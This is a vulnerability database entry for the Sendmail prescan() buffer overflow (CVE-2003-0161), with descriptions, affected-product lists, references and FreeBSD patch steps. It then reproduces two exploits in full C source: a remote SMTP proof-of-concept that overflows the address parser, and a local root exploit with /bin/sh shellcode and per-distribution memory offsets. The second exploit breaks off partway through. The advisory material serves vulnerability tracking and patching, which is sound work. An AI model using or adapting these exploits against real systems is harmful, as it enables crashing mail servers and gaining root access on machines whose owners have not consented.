CVE-2003-0161
CVSS 10.0
Published: 2003-04-02 00:00:00
Revised: 2016-10-17 22:30:15

[Original] The prescan() function in the address parser (parseaddr.c) in Sendmail before 8.12.9 does not properly handle certain conversions from char and int types, which can cause a length check to be disabled when Sendmail misinterprets an input value as a special "NOCHAR" control value, allowing attackers to cause a denial of service and possibly execute arbitrary code via a buffer overflow attack using messages, a different vulnerability than CVE-2002-1337.


[CNNVD] Sendmail Address Prescan Memory Corruption Vulnerability (CNNVD-200304-025)

        
Most organizations have several mail transfer agents (MTAs) at various locations within their network, at least one of which is connected directly to the Internet. Sendmail is the most popular MTA; by some estimates it handles 50% to 75% of all Internet mail traffic. Many UNIX and Linux workstations run Sendmail by default.
Sendmail lacks a proper length check when processing mail addresses. A remote attacker can exploit this to overflow a buffer in the Sendmail service and possibly execute arbitrary commands on the system with the privileges of the sendmail process.
The flaw is in the prescan() routine, which processes email addresses in SMTP headers. A logic error in the conversion of a character to an integer prevents the length of the email address from being checked adequately; an email message with a specially crafted address can trigger a stack overflow.
This vulnerability is message-oriented rather than connection-oriented: it is triggered by the content of a specially crafted mail message, not by lower-level network traffic. This matters because MTAs that are not themselves vulnerable will relay the malicious message on to other, supposedly protected MTAs inside the network. In other words, even if a site's border MTA is not running sendmail, vulnerable sendmail servers inside the network remain at risk. A message able to exploit this vulnerability can also pass through many common packet filters or firewalls undetected.

This vulnerability has been successfully exploited to cause a denial of service in a laboratory environment. On some vulnerable systems it can be exploited to execute code.
        

- CVSS (base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:sendmail:sendmail_switch:3.0.2
cpe:/o:compaq:tru64:4.0f_pk7_bl18  (Compaq Tru64 4.0f PK7_BL18)
cpe:/a:sendmail:sendmail:8.10.2  (Sendmail Sendmail 8.10.2)
cpe:/o:sun:solaris:7.0::x86
cpe:/a:sendmail:sendmail:8.10.1  (Sendmail Sendmail 8.10.1)
cpe:/o:hp:hp-ux:10.16  (HP HP-UX 10.16)
cpe:/o:sun:solaris:2.5.1::ppc
cpe:/a:sendmail:sendmail:3.0  (Sendmail Sendmail 3.0)
cpe:/a:sendmail:sendmail_switch:2.2.5
cpe:/a:sendmail:sendmail_switch:2.2.1
cpe:/o:compaq:tru64:5.1a_pk1_bl1  (Compaq Tru64 5.1a PK1_BL1)
cpe:/a:sendmail:sendmail_switch:2.2.4
cpe:/o:compaq:tru64:4.0g_pk3_bl17  (Compaq Tru64 4.0g PK3_BL17)
cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5.1::x86
cpe:/a:sendmail:sendmail_switch:3.0
cpe:/o:hp:hp-ux:10.00  (HP HP-UX 10.00)
cpe:/o:hp:hp-ux:10.24  (HP HP-UX 10.24)
cpe:/a:sendmail:sendmail_switch:2.1.3
cpe:/a:sendmail:sendmail_switch:2.1.4
cpe:/a:sendmail:sendmail_switch:2.1.1
cpe:/o:compaq:tru64:5.0a_pk3_bl17  (Compaq Tru64 5.0a PK3_BL17)
cpe:/a:sendmail:sendmail:8.9.3  (Sendmail Sendmail 8.9.3)
cpe:/a:sendmail:sendmail:8.9.0  (Sendmail Sendmail 8.9.0)
cpe:/a:sendmail:sendmail:8.12:beta10  (Sendmail Sendmail 8.12 Beta10)
cpe:/a:sendmail:sendmail:8.9.2  (Sendmail Sendmail 8.9.2)
cpe:/a:sendmail:sendmail:8.9.1  (Sendmail Sendmail 8.9.1)
cpe:/o:compaq:tru64:4.0f_pk6_bl17  (Compaq Tru64 4.0f PK6_BL17)
cpe:/o:hp:hp-ux:10.10  (HP HP-UX 10.10)
cpe:/o:hp:hp-ux:10.26  (HP HP-UX 10.26)
cpe:/o:sun:solaris:8.0::x86
cpe:/a:sendmail:sendmail:8.11.1  (Sendmail Sendmail 8.11.1)
cpe:/a:sendmail:sendmail:8.11.0  (Sendmail Sendmail 8.11)
cpe:/a:sendmail:sendmail:8.11.3  (Sendmail Sendmail 8.11.3)
cpe:/a:sendmail:sendmail:8.11.2  (Sendmail Sendmail 8.11.2)
cpe:/a:sendmail:sendmail:8.11.5  (Sendmail Sendmail 8.11.5)
cpe:/a:sendmail:sendmail:8.12:beta12  (Sendmail Sendmail 8.12 Beta12)
cpe:/a:sendmail:sendmail:8.11.4  (Sendmail Sendmail 8.11.4)
cpe:/o:compaq:tru64:5.1_pk3_bl17  (Compaq Tru64 5.1 PK3_BL17)
cpe:/a:sendmail:sendmail:8.11.6  (Sendmail Sendmail 8.11.6)
cpe:/a:sendmail:sendmail:8.12:beta16  (Sendmail Sendmail 8.12 Beta16)
cpe:/o:compaq:tru64:4.0f  (Compaq Tru64 4.0f)
cpe:/o:compaq:tru64:4.0g  (Compaq Tru64 4.0g)
cpe:/o:compaq:tru64:4.0b  (Compaq Tru64 4.0b)
cpe:/o:compaq:tru64:5.1b_pk1_bl1  (Compaq Tru64 5.1b PK1_BL1)
cpe:/o:compaq:tru64:4.0d  (Compaq Tru64 4.0d)
cpe:/o:sun:solaris:7.0
cpe:/a:sendmail:sendmail_switch:2.1.2
cpe:/a:sendmail:sendmail_switch:2.1.5
cpe:/a:sendmail:sendmail:8.12:beta5  (Sendmail Sendmail 8.12 Beta5)
cpe:/o:hp:hp-ux:10.01  (HP HP-UX 10.01)
cpe:/o:hp:hp-ux:10.08  (HP HP-UX 10.8)
cpe:/a:sendmail:sendmail:8.12:beta7  (Sendmail Sendmail 8.12 beta7)
cpe:/o:compaq:tru64:5.1a_pk2_bl2  (Compaq Tru64 5.1a PK2_BL2)
cpe:/o:compaq:tru64:5.1_pk6_bl20  (Compaq Tru64 5.1 PK6_BL20)
cpe:/o:hp:hp-ux:10.09  (HP HP-UX 10.9)
cpe:/o:compaq:tru64:5.1_pk4_bl18  (Compaq Tru64 5.1 PK4_BL18)
cpe:/o:hp:sis
cpe:/o:sun:solaris:9.0::x86
cpe:/a:sendmail:sendmail:8.12.0  (Sendmail Sendmail 8.12.0)
cpe:/a:sendmail:sendmail:8.12.2  (Sendmail Sendmail 8.12.2)
cpe:/a:sendmail:sendmail:8.12.1  (Sendmail Sendmail 8.12.1)
cpe:/a:sendmail:sendmail:8.12.4  (Sendmail Sendmail 8.12.4)
cpe:/a:sendmail:sendmail:8.12.3  (Sendmail Sendmail 8.12.3)
cpe:/a:sendmail:sendmail:8.12.6  (Sendmail Sendmail 8.12.6)
cpe:/a:sendmail:sendmail:8.12.5  (Sendmail Sendmail 8.12.5)
cpe:/o:sun:solaris:2.5
cpe:/o:compaq:tru64:5.1_pk5_bl19  (Compaq Tru64 5.1 PK5_BL19)
cpe:/o:sun:solaris:2.4
cpe:/o:sun:solaris:2.6
cpe:/o:hp:hp-ux:11.11  (HP-UX 11.11)
cpe:/o:sun:solaris:2.5.1
cpe:/a:sendmail:sendmail:8.12.8  (Sendmail Sendmail 8.12.8)
cpe:/a:sendmail:sendmail:8.12.7  (Sendmail Sendmail 8.12.7)
cpe:/o:compaq:tru64:4.0d_pk9_bl17  (Compaq Tru64 4.0d PK9_BL17)
cpe:/o:compaq:tru64:5.0f  (Compaq Tru64 5.0f)
cpe:/a:sendmail:sendmail:8.10  (Sendmail Sendmail 8.10)
cpe:/o:compaq:tru64:5.0a  (Compaq Tru64 5.0a)
cpe:/o:hp:hp-ux_series_800:10.20  (HP hp-ux series 800 10.20)
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:hp:hp-ux:11.22  (HP-UX 11i v1.6)
cpe:/o:hp:hp-ux:11.20  (HP-UX 11i v1.5)
cpe:/o:hp:hp-ux:10.34  (HP HP-UX 10.34)
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.4::x86
cpe:/a:sendmail:sendmail:2.6  (Sendmail Sendmail 2.6)
cpe:/o:sun:solaris:9.0:x86_update_2
cpe:/a:sendmail:sendmail:2.6.1  (Sendmail Sendmail 2.6.1)
cpe:/a:sendmail:sendmail:2.6.2  (Sendmail Sendmail 2.6.2)
cpe:/o:compaq:tru64:5.1a  (Compaq Tru64 5.1a)
cpe:/o:compaq:tru64:5.0_pk4_bl17  (Compaq Tru64 5.0 PK4_BL17)
cpe:/o:compaq:tru64:5.1b  (Compaq Tru64 5.1b)
cpe:/o:compaq:tru64:5.0_pk4_bl18  (Compaq Tru64 5.0 PK4_BL18)
cpe:/a:sendmail:sendmail_switch:2.1
cpe:/a:sendmail:sendmail_switch:2.2
cpe:/o:hp:hp-ux:10.20  (HP HP-UX 10.20)
cpe:/o:compaq:tru64:5.0  (Compaq Tru64 5.0)
cpe:/a:sendmail:sendmail_switch:2.2.2
cpe:/a:sendmail:sendmail_switch:2.2.3
cpe:/o:compaq:tru64:5.1  (Compaq Tru64 5.1)
cpe:/a:sendmail:sendmail:3.0.3  (Sendmail Sendmail 3.0.3)
cpe:/o:compaq:tru64:5.1a_pk3_bl3  (Compaq Tru64 5.1a PK3_BL3)
cpe:/a:sendmail:sendmail:3.0.2  (Sendmail Sendmail 3.0.2)
cpe:/a:sendmail:sendmail:3.0.1  (Sendmail Sendmail 3.0.1)
cpe:/o:hp:hp-ux_series_700:10.20  (HP hp-ux series 700 10.20)
cpe:/o:hp:hp-ux:11.00  (HP-UX 11.00)
cpe:/a:sendmail:sendmail_switch:3.0.1
cpe:/o:hp:hp-ux:10.30  (HP HP-UX 10.30)
cpe:/o:hp:hp-ux:11.0.4  (HP HP-UX 11.0.4)
cpe:/a:sendmail:sendmail_switch:3.0.3

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0161
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0161
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200304-025
(Official data source) CNNVD

- Other links and resources

ftp://ftp.caldera.com/pub/security/OpenLinux/CSSA-2003-016.0.txt
(UNKNOWN)  CALDERA  CSSA-2003-016.0
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:07.sendmail.asc
(UNKNOWN)  FREEBSD  FreeBSD-SA-03:07
ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.11/SCOSA-2004.11.txt
(UNKNOWN)  SCO  SCOSA-2004.11
ftp://patches.sgi.com/support/free/security/advisories/20030401-01-P
(UNKNOWN)  SGI  20030401-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000614
(UNKNOWN)  CONECTIVA  CLA-2003:614
http://lists.apple.com/mhonarc/security-announce/msg00028.html
(UNKNOWN)  CONFIRM  http://lists.apple.com/mhonarc/security-announce/msg00028.html
http://lists.grok.org.uk/pipermail/full-disclosure/2003-March/004295.html
(UNKNOWN)  FULLDISC  20030329 Sendmail: -1 gone wild
http://marc.info/?l=bugtraq&m=104896621106790&w=2
(UNKNOWN)  BUGTRAQ  20030329 sendmail 8.12.9 available
http://marc.info/?l=bugtraq&m=104897487512238&w=2
(UNKNOWN)  BUGTRAQ  20030329 Sendmail: -1 gone wild
http://marc.info/?l=bugtraq&m=104914999806315&w=2
(UNKNOWN)  BUGTRAQ  20030330 [OpenPKG-SA-2003.027] OpenPKG Security Advisory (sendmail)
http://sunsolve.sun.com/search/document.do?assetkey=1-26-52620-1
(UNKNOWN)  SUNALERT  52620
http://sunsolve.sun.com/search/document.do?assetkey=1-26-52700-1
(UNKNOWN)  SUNALERT  52700
http://sunsolve.sun.com/search/document.do?assetkey=1-77-1001088.1-1
(UNKNOWN)  SUNALERT  1001088
http://www.cert.org/advisories/CA-2003-12.html
(VENDOR_ADVISORY)  CERT  CA-2003-12
http://www.debian.org/security/2003/dsa-278
(UNKNOWN)  DEBIAN  DSA-278
http://www.debian.org/security/2003/dsa-290
(UNKNOWN)  DEBIAN  DSA-290
http://www.gentoo.org/security/en/glsa/glsa-200303-27.xml
(UNKNOWN)  GENTOO  GLSA-200303-27
http://www.kb.cert.org/vuls/id/897604
(UNKNOWN)  CERT-VN  VU#897604
http://www.redhat.com/support/errata/RHSA-2003-120.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:120
http://www.redhat.com/support/errata/RHSA-2003-121.html
(UNKNOWN)  REDHAT  RHSA-2003:121
http://www.securityfocus.com/archive/1/321997
(UNKNOWN)  BUGTRAQ  20030520 [Fwd: 127 Research and Development: 127 Day!]
http://www.securityfocus.com/archive/1/archive/1/316961/30/25250/threaded
(UNKNOWN)  BUGTRAQ  20030331 GLSA: sendmail (200303-27)
http://www.securityfocus.com/archive/1/archive/1/317135/30/25220/threaded
(UNKNOWN)  IMMUNIX  IMNX-2003-7+-002-01
http://www.securityfocus.com/bid/7230
(VENDOR_ADVISORY)  BID  7230

- Vulnerability information

Sendmail Address Prescan Memory Corruption Vulnerability
Critical  Boundary Condition Error
2003-04-02 00:00:00  2010-02-14 00:00:00
Remote / Local
        
        

- Advisories and patches

Vendor patches:
FreeBSD
-------
FreeBSD has released a security advisory (FreeBSD-SA-03:07) and a corresponding patch:
FreeBSD-SA-03:07: a second sendmail header parsing buffer overflow
Link: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:07.sendmail.asc
Patch download:
Do one of the following:
1) Upgrade the vulnerable system to 4-STABLE or 4.8-RELEASE, or to the RELENG_5_0, RELENG_4_7 or RELENG_4_6 security branch dated after the correction date (5.0-RELEASE-p7, 4.7-RELEASE-p10 or 4.6.2-RELEASE-p13 respectively).
2) Patch the current system:
The following patch applies to FreeBSD 4.6, 4.7 and 5.0 systems.
a) Download the relevant patch from the following location and verify the detached PGP signature with your PGP utility.
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail.patch
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail.patch.asc
b) Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/lib/libsm
# make obj && make depend && make
# cd /usr/src/lib/libsmutil
# make obj && make depend && make
# cd /usr/src/usr.sbin/sendmail
# make obj && make depend && make && make install
c) Restart sendmail. Execute the following command as root:
# /bin/sh /etc/rc.sendmail restart
3) Patched sendmail binaries have been released for i386 systems only. Select the appropriate binary according to your FreeBSD version and whether you need STARTTLS support. If you need STARTTLS support, you must install the crypto version.
a) Download the relevant binary from the following location and verify the detached PGP signature with your PGP utility.
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-crypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-crypto.bin.gz.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-nocrypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.6-i386-nocrypto.bin.gz.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-crypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-crypto.bin.gz.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-nocrypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-4.7-i386-nocrypto.bin.gz.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-crypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-crypto.bin.gz.asc
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-nocrypto.bin.gz
ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-03:07/sendmail-5.0-i386-nocrypto.bin.gz.asc
b) Install the binary. Execute the following commands as root. Note that these examples use the FreeBSD 4.7 crypto binary; replace BINARYGZ with the name of the file downloaded in step (a).
# BINARYGZ=/path/to/sendmail-4.7-i386-crypto.bin.gz
# gunzip ${BINARYGZ}
# install -s -o root -g smmsp -m 2555 ${BINARYGZ%.gz} /usr/libexec/sendmail/sendmail
c) Restart sendmail. Execute the following command as root:
# /bin/sh /etc/rc.sendmail restart
VI. Correction details
The following list contains the revision numbers of each file that was corrected in the affected FreeBSD branches.
Path                                                         Revision
- -------------------------------------------------------------------------
RELENG_4
  src/contrib/sendmail/FREEBSD-upgrade 1.1.2.16
  src/contrib/sendmail/RELEASE_NOTES 1.1.1.3.2.15
  src/contrib/sendmail/cf/README 1.1.1.3.2.15
  src/contrib/sendmail/cf/cf/submit.cf 1.1.1.1.2.8
  src/contrib/sendmail/cf/m4/cfhead.m4 1.3.6.8
  src/contrib/sendmail/cf/m4/proto.m4 1.1.1.4.2.13
  src/contrib/sendmail/cf/m4/version.m4 1.1.1.3.2.15
  src/contrib/sendmail/cf/mailer/usenet.m4 1.1.1.2.6.3
  src/contrib/sendmail/contrib/buildvirtuser 1.1.1.1.2.5
  src/contrib/sendmail/doc/op/op.me 1.1.1.3.2.15
  src/contrib/sendmail/editmap/editmap.8 1.1.1.1.2.2
  src/contrib/sendmail/include/sm/bdb.h 1.1.1.1.2.2
  src/contrib/sendmail/include/sm/conf.h 1.1.1.1.2.7
  src/contrib/sendmail/libmilter/docs/api.html 1.1.1.1.2.2
  src/contrib/sendmail/libmilter/docs/design.html 1.1.1.1.2.2
  src/contrib/sendmail/libmilter/docs/index.html 1.1.1.1.2.2
  src/contrib/sendmail/libmilter/docs/installation.html 1.1.1.1.2.3
  src/contrib/sendmail/libmilter/docs/other.html

- Vulnerability information (24)

Sendmail <= 8.12.8 prescan() BSD Remote Root Exploit (EDBID:24)
linux remote
2003-04-30 Verified
25 bysin
N/A
/*
 * Sendmail 8.12.8 prescan() PROOF OF CONCEPT exploit by bysin
 * 
 * This is to prove that the bug in sendmail 8.12.8 and below is vulnerable.
 * On successful POC exploitation the program should crash with the following:
 *
 * Program received signal SIGSEGV, Segmentation fault.
 * 0x5c5c5c5c in ?? ()
 *
 */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>      /* exit(), atol() */
#include <string.h>      /* strlen(), strcpy(), strcat(), memset(), memcpy() */
#include <fcntl.h>
#include <errno.h>

int maxarch=1;
struct arch {
	char *os; // The OS
	int pos; // The position of ebp in the stack, with the last byte being 0x00
	int apos; // The amount of bytes after pvpbuf where ebp is located
	unsigned long addr; // The pointer to the addr buffer
} archs[] = {
	{"FreeBSD 4.7-RELEASE",180,28,0xbfbfdad1},
};


/////////////////////////////////////////////////////////

#define BUFSIZE 50096

void header() {
	printf("Sendmail 8.12.8 prescan() exploit by bysin\n\n");
}

void printtargets() {
	unsigned long i;
	header();
	printf("\t  Target\t Addr\t\t OS\n");
	printf("\t-------------------------------------------\n");
	for (i=0;i<maxarch;i++) printf("\t* %d\t\t 0x%08x\t %s\n",i,archs[i].addr,archs[i].os);
	printf("\n");
}

void printresponse(char *a) {
	printf("%s\n",a);
}

void writesocket(int sock, char *buf) {
	if (send(sock,buf,strlen(buf),0) <= 0) {
		printf("Error writing to socket\n");
		exit(0);
	}
	printresponse(buf);
}

void readsocket(int sock, int response) {
	char temp[BUFSIZE];
	memset(temp,0,sizeof(temp));
	if (recv(sock,temp,sizeof(temp),0) <= 0) {
		printf("Error reading from socket\n");
		exit(0);
	}
	if (response != atol(temp)) {
		printf("Bad response: %s\n",temp);
		exit(0);
	}
	else printresponse(temp);
}

void relay(int sock) {
	while(1) {
		char temp[BUFSIZE];
		memset(temp,0,sizeof(temp));
		if (recv(sock,temp,sizeof(temp),0) <= 0) {
			printf("Server vulnerable (crashed)\n");
			exit(0);
		}
		printresponse(temp);
		if (atol(temp) == 553) {
			printf("Not exploitable\n");
			exit(0);
		}
	}
}

int main(int argc, char **argv) {
	struct sockaddr_in server;
	unsigned long ipaddr,i,j,m;
	int sock,target;
	char tmp[BUFSIZE],buf[BUFSIZE],*p,*pos=NULL;
	if (argc <= 2) {
		printf("%s <target ip> <target number>\n",argv[0]);
		printtargets();
		return 0;
	}
	target=atol(argv[2]);
	if (target < 0 || target >= maxarch) {
		printtargets();
		return 0;
	}

	header();

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		printf("Unable to create socket\n");
		exit(0);
	}
	server.sin_family = AF_INET;
	server.sin_port = htons(25);
	printf("Resolving address... ");
	fflush(stdout);
	if ((ipaddr = inet_addr(argv[1])) == -1) {
		struct hostent *hostm;
		if ((hostm=gethostbyname(argv[1])) == NULL) {
			printf("Unable to resolve address\n");
			exit(0);
		}
		memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
	}
	else server.sin_addr.s_addr = ipaddr;
	memset(&(server.sin_zero), 0, 8);
	printf("Address found\n");
	printf("Connecting... ");
	fflush(stdout);
	if (connect(sock,(struct sockaddr *)&server, sizeof(server)) != 0) {
		printf("Unable to connect\n");
		exit(0);
	}
	printf("Connected\n");
	printf("Sending exploit... \n");
	fflush(stdout);

	readsocket(sock,220);

	writesocket(sock,"HELO yahoo.com\r\n");
	readsocket(sock,250);

	writesocket(sock,"MAIL FROM: <a@yahoo.com>\r\n");
	readsocket(sock,250);

	memset(buf,0,sizeof(buf));
	strcpy(buf,"RCPT TO: ");
	p=buf+strlen(buf);
	for (i=1,j=0,m=0;i<1242;i++) {
		if (!(i%256)) {
			*p++=';';
			j++;
		}
		else {
			if (j < 4) *p++='A';
			else {
				if (m == archs[target].pos) pos=p;
				//if (m > archs[target].pos) *p++='B'; else
				*p++='A';
				m++;
			}
		}
	}
	if (pos) memcpy(pos,(char*)&archs[target].addr,4);
	*p++=';';
	for (i=0;i<archs[target].apos;i++) {
		*p++='\\';
		*p++=0xff;
	}
	strcat(buf,"\r\n");
	writesocket(sock,buf);

	relay(sock);
}


// milw0rm.com [2003-04-30]
		

- Vulnerability information (22442)

sendmail 8.11.6 Address Prescan Memory Corruption Vulnerability (EDBID:22442)
unix remote
2003-03-29 Verified
0 sorbo
N/A
source: http://www.securityfocus.com/bid/7230/info

A vulnerability in Sendmail may be exploited remotely to execute arbitrary code. The flaw is present in the 'prescan()' procedure, which is used for processing email addresses in SMTP headers. This condition has been confirmed to be exploitable by remote attackers to execute instructions on target systems. This vulnerability stems from a logic error in the conversion of a char to an integer value. The issue has been fixed in Sendmail 8.12.9.

/*
 * local exploit for sendmail 8.11.6 
 * by sorbo (sorbox@yahoo.com)
 * http://www.darkircop.org
 *
 * This exploit takes advantage of the vulnerable prescan() function that 
 * allows the user to input 0xff in order to skip the length check of the buffer.
 *
 * The vulnerability was found by Michal Zalewski
 *
 * The goal is to overwrite the 2 lsb of the saved frame pointer and make it 
 * point to an area we control.
 *
 * We can overflow pvpbuf[] in parseaddr() (which calls prescan()) and overwrite 
 * parseaddr's saved frame pointer. 
 * When parseaddr() returns, the control is back to sendtolist() but the frame pointer
 * will be modified (we make it point to somewhere in pvpbuf).
 * We can't just fill pvpbuf with the ret value we want, since sendtolist() doesn't
 * exit right away, but instead makes use of some variables.
 * We need therefore to construct pvpbuf in an intelligent way, so references to variables
 * will be valid.
 * The first variable to set is delimptr (located at ebp - something). 
 * We simply make this point to a 0, so the for loop exits.
 * The next variable to set is al (located at ebp - something ). We need to make a->q_next 
 * point to 0 so the while loop exits. a->q_next is a+11*4.
 * The next variable is e (ebp + something). We make it point to a 0
 * The next variable is bufp (ebp - something). This needs to be equal to buf to skip the free.
 * This cannot be done since the address contains a 0xff and this cannot be input in pvpbuf.
 * We just make it point to a valid chunk (in our case... our fake chunk). We can't make it point
 * to stack since arena_for_ptr() will fail. Luckily our arguments get copied on the heap, so we 
 * just point it to that.
 * Next we just set the ret (ebp + 4) to our shellcode and when sendtolist() exits our
 * shellcode will be executed. Note shellcode is even copied on heap, so non executable stacks will not
 * stop the exploit (the ret addr must match the shellcode location on the heap though)
 *
 * Note that if we overflow ebp by only one byte (putting a 0) i.e. the classical way
 * will not work since the register will not point to pvpbuf. What we do is overwrite two
 * bytes with 0x005c. Then we fill up the stack (by passing a long argument) so we lower the 
 * address of pvpbuf until it is in the range of the ebp. Also our shellcode will be at a low
 * stack address < 0xbffefefe (since we cannot write 0xff in pvpbuf).
 *
 * NOTE: sendmail 8.12.8 cannot be exploited this way since there is an assert() which cannot
 * be bypassed (in sendtolist()).
 *
 * have fun
 *
 * Greetz: Knight420, Stefano Biondi, nevez
 *
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/wait.h>
              

char shellcode[] =
	/* NOPs (so we don't have to be exact in shellcode addr calculation) */
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
        "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

        /* setuid(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x17"                              /* mov $0x17,%al */
        "\xcd\x80"                              /* int $0x80     */

        /* setgid(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x2e"                              /* mov $0x2e,%al */
        "\xcd\x80"                              /* int $0x80     */

        /* /bin/sh execve(); */
        "\x31\xc0"                              /* xor  %eax,%eax   */
        "\x50"                                  /* push %eax        */
        "\x68\x2f\x2f\x73\x68"                  /* push $0x68732f2f */
        "\x68\x2f\x62\x69\x6e"                  /* push $0x6e69622f */
        "\x89\xe3"                              /* mov  %esp,%ebx   */
        "\x50"                                  /* push %eax        */
        "\x53"                                  /* push %ebx        */
        "\x89\xe1"                              /* mov  %esp,%ecx   */
        "\x31\xd2"                              /* xor  %edx,%edx   */
        "\xb0\x0b"                              /* mov  $0xb,%al    */
        "\xcd\x80"                              /* int  $0x80       */

        /* exit(0); */
        "\x31\xdb"                              /* xor %ebx,%ebx */
        "\x89\xd8"                              /* mov %ebx,%eax */
        "\xb0\x01"                              /* mov $0x01,%al */
        "\xcd\x80";                             /* int $0x80     */




/* NOTE: not all characters are passable:
 *	0x00 (duh), 0xff, 0x09-0x0d, 0x20-0x22, 0x25, 0x28, 0x29, 0x2b, 0x2c
 *	0x2e,0x2f,0x3a-0x3c,0x3e,0x40,0x5b,0x5d,0x5e,0x80-0x9f 
 *
 * the REAL variables are only pvpbuf and chunk... so don't get scared by all these
 * required variables. Most of them are fixed =D.
 */
struct target_info {
	char *description;	/* target description */
	char *sendmail;		/* sendmail path */
	int stack_len;		/* how much stuff to put in stack */
	int distance;		/* distance in bytes from pvpbuf to last 2 bytes of saved framepointer */
	int ebp;		/* the value ebp will have */
	int pvpbuf;		/* address of pvpbuf */
	int zero;		/* address of a 0 in memory */
	int chunk;		/* address of a chunk to free */
	int ret;		/* address of shellcode (aprox 0xc0000000 - stack_len) */
	int delimptr;		/* delimptr -ebp */
	int al;			/* al - ebp */
	int e;			/* e - ebp */
	int bufp;		/* bufp - ebp */
	
};


struct target_info targets[] = {

	{"Slackware 8.0","/usr/sbin/sendmail",123090,1258,0xbffe005c,0xbffdfef4,0xbffe15d6,0x80f30a0,0xbffe1f36,-264,-268,24,-284},	
        {"Redhat 7.3","/usr/sbin/sendmail.sendmail",123074,1290,0xbffe005c,0xbffdfcd0,0xbffe19a6,0x80f30a0,0xbffe1f36,-300,-304,24,-320},
	{"Redhat 7.2","/usr/sbin/sendmail",123090,1290,0xbffe005c,0xbffdfcd0,0xbffe19a6,0x80f30a0,0xbffe1f36,-300,-304,24,-320}        
};



/* return 1 if successful
 * 0 if failed
 *
 */
int exploit(struct target_info target) {
	char *stackfiller=0;	/* data to lower stack (we can put fake chunks and shellcode here) */
	char egg[1024*3];	/* the argument to prescan() */
	char *ptr;
	int  *ptr2;
	int i;
	int pid;
	char *arg[] = { "owned",egg,stackfiller,NULL};


	

	/* prepare stack filler */
	stackfiller = (char*) malloc(target.stack_len);
	if(!stackfiller) {
		perror("malloc()");
		exit(0);
	}
	
	memset(stackfiller,'A',target.stack_len);
	*(stackfiller+target.stack_len-1) = 0;

	ptr = stackfiller;
	
        while(1) {
		/* fake chunk */
	        char *chunk = 	"\xfc\xff\xff\xff"
	        		"\xfc\xff\xff\xff"
	        		"\xa1\xff\xff\xbf"
	        		"\xa1\xff\xff\xbf"	/* yes unlink will overwrite 0xbfffffa1+12 ... but who cares */
	        		"\xa1\xff\xff\xbf";
	        		
                memcpy(ptr,chunk,strlen(chunk));
	        ptr += strlen(chunk);
	                                                       
	        if(ptr + strlen(chunk) >= stackfiller+target.stack_len-1)
	                break;
	}
	memcpy(stackfiller,shellcode,strlen(shellcode));
	arg[2] = stackfiller;		                                                                                                        



	/* prepare egg */
	memset(egg,'A',1200);
	egg[1200] = 0;
	
        for(i=0; i < target.distance - 1200; i++) 
	        strcat(egg,"\xff\\");
	                                	
        /* set delimptr */
        ptr2 = (int*) &egg[target.ebp+target.delimptr-target.pvpbuf];
        *ptr2 = target.zero;

        /* set al  */
        ptr2 = (int*) &egg[target.ebp+target.al-target.pvpbuf];
	*ptr2 = target.zero-11*4;
	
        /* set e  */
        ptr2 = (int*) &egg[target.ebp+target.e-target.pvpbuf];
